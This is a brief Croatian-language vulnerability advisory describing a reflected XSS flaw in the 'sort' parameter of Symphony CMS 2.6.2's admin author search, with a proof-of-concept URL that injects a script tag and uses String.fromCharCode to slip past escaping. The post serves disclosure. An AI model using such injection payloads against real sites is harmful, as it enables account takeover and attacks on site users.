Symphony CMS XSS Ranjivost

June 8, 2015

Symphony CMS XSS Ranjivost

Parametar “sort” korišten za author search u Admin je ranjiv na XSS napade. Escape stringova na unosu se može zaobici koristeći javascript funkcije charCodeAt() i fromCharCode().

npr. : String.fromCharCode(72,69,76,76)

Primjer XSS napada ( proof of concept ) :

http://localhost/symphony-2.6.2/symphony/system/authors/?sort=</h1><script>alert(String.fromCharCode(72,69,76,76))</script><h1>&order=asc

Ranjiva verzija : Symphony CMS 2.6.2

Izvor:hyp3rlinx.altervista.org

Značaj ranjivosti:VAŽNO

Platforma:Linux

CVE oznaka:N/A

Leave a Reply Cancel reply

You must be logged in to post a comment.